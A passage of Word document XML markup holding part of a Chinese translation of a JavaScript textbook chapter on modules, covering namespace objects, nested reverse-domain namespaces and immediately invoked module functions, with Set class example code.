        <w:t>工具包和</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>库定义了</w:t>
      </w:r>
      <w:r>
        <w:t>provide()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>函数，用以声明和加载模块。并且，</w:t>
      </w:r>
      <w:r>
        <w:t>CommonJS</w:t>
      </w:r>
      <w:r>
        <w:t>服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规范（参照</w:t>
      </w:r>
      <w:r>
        <w:t>http://commonjs.org</w:t>
      </w:r>
      <w:r>
        <w:t>）创建了一个模块规范，后者同样使用</w:t>
      </w:r>
      <w:r>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。这种模块系统通常用来处理模块加载和依赖性管理，这些内容已经超出本书的讨论范围。如果使用这些框架，则必须按照框架提供的模块编写约定来定义模块。本节仅对模块约定做一些简单的讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>模块化的目标是支持大规模的程序开发，处理分散</w:t>
      </w:r>
      <w:r>
        <w:t>源中代码的组装，并且能让代码正确运行，哪怕包含了作者所不期望出现的模块代码，也可以正确执行代码。为了做到这一点，不同的模块必须避免修改全局执行上下文，因此后续模块应当在它们所期望运行的原始（或接近原始）上下文中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r>
        <w:t>。这实际上意味着模块应当尽可能少地定义全局标识，理想状况是，所有模块都不应当定义超过一个（全局标识）。接下来我们给出的一种简单的方法可以做到这一点。你会发现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中实现一个模块代码并不困难：在本书中很多示例代码都用到了这种技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="9_9_1_Yong_Zuo_Ming_Ming_Kong_Jian_De_Du"/>
      <w:r>
        <w:t>9.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用做命名空间的对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在模块创建过</w:t>
      </w:r>
      <w:r>
        <w:t>程中避免污染全局变量的一种方法是使用一个对象作为命名空间。它将函数和值作为命名空间对象属性存储起来</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（可以通过全局变量引用），而不是定义全局函数和变量。拿例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类来说，它定义了一个全局构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>。然后给这个类定义了很多实例方法，但将这些实例方法存储为</w:t>
      </w:r>
      <w:r>
        <w:t>Set.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，因此这些方法不是全局的。示例代码也包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>_v2s()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数，但也没有定义它为全局函数，而是把它存储为</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来看一下例</w:t>
      </w:r>
      <w:r>
        <w:t>9-16</w:t>
      </w:r>
      <w:r>
        <w:t>，这个例子定义了很多抽象类和非抽象类。每个类都只包含一个全局标识，但整</w:t>
      </w:r>
      <w:r>
        <w:t>个模块（这个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件）定义了很少的全局变量。基于这种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>保持干净的全局命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的观点，一种更好的做法是将</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>类定义为一个单独的全局对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sets={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>对象是模块的命名空间，并且将每个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>类都定义为这个对象的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sets.SingletonSet=sets.AbstractEnumerableSet.extend(...);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想使用这样定义的类，需要通过命名空间来调用所需的构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var s=new sets.SingletonSet(1</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>模块的作者并不知道他的模块会和哪些其他模块一起工作，因此尤为注意这种命名空间的用法带来的命名冲突。然而，使用这个模块的开发者是知道它用了哪些模块、用到了哪些名字的。程序员并不一定要严格遵守命名空间的写法，只需将常用的值</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>导入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到全局命名空间中。程序员如果要经常使用</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类，可以这样将它导入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Set=sets.Set;//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>导入到全局命名空间中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=new Set(1,2,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>这样每次使用它就不必加</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>前缀了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时模块作者会使用更深层嵌套的命名空间。如果</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>模块是另外一组更大的模块集合的话，它的命名空间可能会是</w:t>
      </w:r>
      <w:r>
        <w:t>collections.sets</w:t>
      </w:r>
      <w:r>
        <w:t>，模块代码的开始会这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var collections;//</w:t>
      </w:r>
      <w:r>
        <w:t>声明</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>或重新声明</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>这个全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!collections)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它原本不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections={};//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个顶层的命名空间对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets={}//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间创建在它的内部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>collections.sets</w:t>
      </w:r>
      <w:r>
        <w:t>内定义</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets.AbstractSet=function(){...}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最顶层的命名空间往往用来标识创建模块的作者或组织，并避免命名空间的命名冲突。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>库在它的命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>goog.structs</w:t>
      </w:r>
      <w:r>
        <w:t>中定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类。每个开发者都反转互联网域名的组成部分，这样创建的命名空间前缀是全局唯一的，一般不会被其他模块作者采用。比如我的网站是</w:t>
      </w:r>
      <w:r>
        <w:t>davidflanagan.com</w:t>
      </w:r>
      <w:r>
        <w:t>，我可以通过这个命名空间来发布我的</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>模块：</w:t>
      </w:r>
      <w:r>
        <w:t>com.davidflanagan.clooectin</w:t>
      </w:r>
      <w:r>
        <w:t>os.sets</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用很长的命名空间来导入模块的方式非常重要，然而程序员往往将整个模块导入全局命名空间，而不是导入（命名空间中的某个）单独的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sets=com.davidflanagan.collections.sets;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>按照约定，模块的文件名应当和命名空间匹配。</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>模块应当保存在文件</w:t>
      </w:r>
      <w:r>
        <w:t>sets.js</w:t>
      </w:r>
      <w:r>
        <w:t>中。如果这个模块使用命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>collections.sets</w:t>
      </w:r>
      <w:r>
        <w:t>，那么这个文件应当保存在目录</w:t>
      </w:r>
      <w:r>
        <w:t>collections/</w:t>
      </w:r>
      <w:r>
        <w:t>下（这个目录还应当包含另一个文件</w:t>
      </w:r>
      <w:r>
        <w:t>maps.js</w:t>
      </w:r>
      <w:r>
        <w:t>）。并且使用命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>com.da</w:t>
      </w:r>
      <w:r>
        <w:t>vidflanagan.collections.sets</w:t>
      </w:r>
      <w:r>
        <w:t>的模块应当在文件</w:t>
      </w:r>
      <w:r>
        <w:t>com/davidflanagan/collections/sets.js</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="9_9_2_Zuo_Wei_Si_You_Ming_Ming_Kong_Jian"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为私有命名空间的函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>模块对外导出一些公用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是提供给其他程序员使用的，它包括函数、类、属性和方法。但模块的实现往往需要一些额外的辅助函数和方法，这些函数和方法并不需要在模块外部可见。比如，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set._v2s()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，模块作者不希望</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的用户在某时刻调用这个函数，因此这个方法最好在类的外部是不可访问的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过将模</w:t>
      </w:r>
      <w:r>
        <w:t>块（本例中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类）定义在某个函数的内部来实现。正如</w:t>
      </w:r>
      <w:r>
        <w:t>8.5</w:t>
      </w:r>
      <w:r>
        <w:t>节所描述的一样，在一个函数中定义的变量和函数都属于函数的局部成员，在函数的外部是不可见的。实际上，可以将这个函数作用域用做模块的私有命名空间（有时称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模块函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-24</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模块函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来实现</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-24</w:t>
      </w:r>
      <w:r>
        <w:t>：模块函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>声明全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>，使用一个函数的返回值给它赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>函数结束时紧跟的一对圆括号说明这个函数定义后立即执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它的返回值将赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是将这个函数赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意它是一个函数表达</w:t>
      </w:r>
      <w:r>
        <w:t>式，不是一条语句，因此函数</w:t>
      </w:r>
      <w:r>
        <w:t>"invocation"</w:t>
      </w:r>
      <w:r>
        <w:t>并没有创建全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var Set=(function invocation(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Set(){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个构造函数是局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values={};//</w:t>
      </w:r>
      <w:r>
        <w:t>这个对象的属性用来保存这个集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合中值的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add.apply(this,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有的参数都添加至集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>Set.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>定义实例方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略了详细代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.contains=function(value){//</w:t>
      </w:r>
      <w:r>
        <w:t>注意我们调用了</w:t>
      </w:r>
      <w:r>
        <w:t>v2s()</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是调用带有笨重的前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>set._v2s()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.values.hasOwnProperty(v2s(value));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.size=function(){return this.n;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.add=function(){/*...*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.remove=function(){/*...*/};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.foreach=function(f,context){/*...*/};//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是上面的方法用到的一些辅助函数和变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它们不属于模块的共有</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但它们都隐藏在这个函数作用域内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此我们不必将它们定义为</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的属性或使用下划线作为其前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function v2s(val){/*...*/}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function objectId(o){/*...*/}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var nextId=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块的共有</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Set()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们需要把这个函数从私有命名空间中导出来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
